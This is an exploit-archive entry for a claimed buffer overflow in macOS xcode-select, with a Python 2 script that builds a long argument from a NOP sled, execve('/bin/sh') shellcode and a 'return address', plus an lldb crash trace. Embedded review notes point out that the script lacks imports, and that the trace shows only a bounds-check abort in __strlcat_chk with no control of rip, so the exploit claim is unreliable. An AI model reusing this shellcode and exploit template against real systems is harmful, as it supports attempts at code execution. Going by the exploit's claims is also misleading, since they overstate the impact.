# Exploit Title: xcode-select - buffer overflow
# Description: xcode-select controls the location of the developer directory used by xcrun(1), xcodebuild(1), cc(1), and other Xcode and BSD development tools.
# Date: Tuesday 23 2014
# Exploit Author: Juan Sacco
# Vendor Homepage: https://developer.apple.com
# Software Link: https://developer.apple.com/xcode/
# Version: 2333
# Tested on: 13.4.0 Darwin Kernel Version 13.4.0
# CVE : None
#
# NOTE(review): the listing is Python 2 (print statements) and uses
# `subprocess` and `os` without importing them anywhere in this listing;
# `os.errno` is also not a documented attribute of the os module (ENOENT
# lives in the `errno` module).  As shown, the script does not run unmodified.
#
# NOTE(review): read together with the lldb session that follows, the
# observed effect is a deliberate abort, not a hijacked control flow.
# Frames #7 -> #4 of the backtrace are __strlcat_chk -> __chk_overlap ->
# __chk_fail_overlap -> __chk_fail, followed by abort_report_np/abort: the
# bounds-checked strlcat called from
# libxcselect.dylib`xcselect_find_developer_contents_from_path rejects the
# oversized argument and terminates the process with SIGABRT.  Nothing on
# this page shows an input-derived value reaching rip; the impact shown is
# a crash of a process the invoking user launched themselves.

# 5631 single-byte NOPs (0x90).  Together with the three pieces below the
# argument handed to xcode-select is 5631 + 24 + 356 + 6 = 6017 bytes long.
junk = "\x90"*5631
# 24-byte payload (the trailing comment is the author's).  The trace below
# never shows execution reaching this data.
shellcode = "\x31\xc0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x50\x53\xB0\x3B\x6A\x2A\xCD\x80" #OSX/x86 intel - execve(/bin/sh) - 24 bytes
# 89 * 4 = 356 further NOP bytes.  (`buffer` shadows a Python 2 builtin.)
buffer = "\x90\x90\x90\x90"*89
# These 6 bytes spell 0x7fff8e199866, which the debugger output below
# identifies as libsystem_kernel.dylib`__pthread_kill + 10 -- the pc (rip)
# at which the process stopped on SIGABRT.  It is the crash location copied
# back from lldb, not a value the input is shown to control.
eip = "\x7f\xff\x8e\x19\x98\x66"
print "# xcode-select is prone to an overflow"
print "# Wasting CPU clocks on unusable exploits"
print "# This is exploit is for educational purposes"
try:
    # Runs /usr/bin/xcode-select with the 6017-byte string as its single
    # argument; the session below records the outcome as SIGABRT from the
    # fortified strlcat.
    subprocess.call(["xcode-select", junk+shellcode+buffer+eip])
except OSError as e:
    # OSError here means the binary could not be started at all; ENOENT is
    # reported as "not found", anything else is re-raised.
    if e.errno == os.errno.ENOENT:
        print "xcode-select not found!"
    else:
        print "Error executing exploit"
        raise
Process 5932 launched: '/usr/bin/xcode-select' (x86_64)
Process 5932 stopped
* thread #1: tid = 0x8358c, 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
    frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8e199866: jae 0x7fff8e199870 ; __pthread_kill + 20
   0x7fff8e199868: movq %rax, %rdi
   0x7fff8e19986b: jmpq 0x7fff8e196175 ; cerror_nocancel
   0x7fff8e199870: ret
(lldb)
(lldb) bt
* thread #1: tid = 0x8358c, 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff91b8a35c libsystem_pthread.dylib`pthread_kill + 92
    frame #2: 0x00007fff8a0a7b1a libsystem_c.dylib`abort + 125
    frame #3: 0x00007fff8a0a7c91 libsystem_c.dylib`abort_report_np + 181
    frame #4:
0x00007fff8a0cb860 libsystem_c.dylib`__chk_fail + 48
    frame #5: 0x00007fff8a0cb870 libsystem_c.dylib`__chk_fail_overlap + 16
    frame #6: 0x00007fff8a0cb892 libsystem_c.dylib`__chk_overlap + 34
    frame #7: 0x00007fff8a0cb795 libsystem_c.dylib`__strlcat_chk + 157
    frame #8: 0x0000000100006315 libxcselect.dylib`xcselect_find_developer_contents_from_path + 116
    frame #9: 0x0000000100000e75 xcode-select`___lldb_unnamed_function3$$xcode-select + 57
    frame #10: 0x0000000100001562 xcode-select`___lldb_unnamed_function5$$xcode-select + 1083a
(lldb) register r -a
General Purpose Registers:
       rax = 0x0000000000000000
       rbx = 0x00007fff769df310  libsystem_pthread.dylib`_thread
       rcx = 0x00007fff5fbfce18
       rdx = 0x0000000000000000
       rdi = 0x0000000000000d0b
       rsi = 0x0000000000000006
       rbp = 0x00007fff5fbfce40
       rsp = 0x00007fff5fbfce18
        r8 = 0x00000000fffffc00
        r9 = 0x00007fff5fbfce00
       r10 = 0x0000000008000000
       r11 = 0x0000000000000206
       r12 = 0x0000000000000400
       r13 = 0x000000000000000e
       r14 = 0x0000000000000006
       r15 = 0x00007fff5fbfd120
       rip = 0x00007fff8e199866  libsystem_kernel.dylib`__pthread_kill + 10
    rflags = 0x0000000000000206
        cs = 0x0000000000000007
        fs = 0x0000000000000000
        gs = 0x0000000000030000
       eax = 0x00000000
       ebx = 0x769df310
       ecx = 0x5fbfce18
       edx = 0x00000000
       edi = 0x00000d0b
       esi = 0x00000006
       ebp = 0x5fbfce40
       esp = 0x5fbfce18
       r8d = 0xfffffc00
       r9d = 0x5fbfce00
      r10d = 0x08000000
      r11d = 0x00000206
      r12d = 0x00000400
      r13d = 0x0000000e
      r14d = 0x00000006
      r15d = 0x5fbfd120